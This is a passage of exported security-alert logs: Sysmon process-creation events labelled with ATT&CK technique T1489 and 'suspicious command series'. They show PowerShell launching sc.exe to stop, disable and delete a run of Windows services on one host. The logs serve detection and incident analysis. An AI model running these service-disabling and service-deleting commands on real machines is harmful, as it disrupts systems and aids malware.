Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.899",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.643 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001081591900} +ProcessId: 2564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.644893600Z"",""eventRecordID"":""2096"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.643\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001081591900}\r\nProcessId: 2564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:34.643"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001081591900}"",""processId"":""2564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.838",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.553 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010ba561900} +ProcessId: 4628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.556553800Z"",""eventRecordID"":""2093"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.553\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010ba561900}\r\nProcessId: 4628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.553"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010ba561900}"",""processId"":""4628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.821",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.540 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f2551900} +ProcessId: 7120 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: 
""C:\Windows\system32\sc.exe"" Config ""Sncryption Media Playeq"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.543904600Z"",""eventRecordID"":""2092"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.540\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f2551900}\r\nProcessId: 7120\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 
0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.540"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010f2551900}"",""processId"":""7120"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Sncryption Media Playeq\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.791",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.468 +ProcessGuid: 
{df9fc3d3-b35e-5ecf-0000-00105f541900} +ProcessId: 6452 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.471194000Z"",""eventRecordID"":""2090"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.468\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00105f541900}\r\nProcessId: 6452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.468"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00105f541900}"",""processId"":""6452"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.743",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.426 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001003521900} +ProcessId: 3068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.428641800Z"",""eventRecordID"":""2087"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.426\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001003521900}\r\nProcessId: 3068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.426"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001003521900}"",""processId"":""3068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.712",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.406 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106f501900} +ProcessId: 3532 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.407840800Z"",""eventRecordID"":""2085"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.406\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106f501900}\r\nProcessId: 3532\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:34.406"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00106f501900}"",""processId"":""3532"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 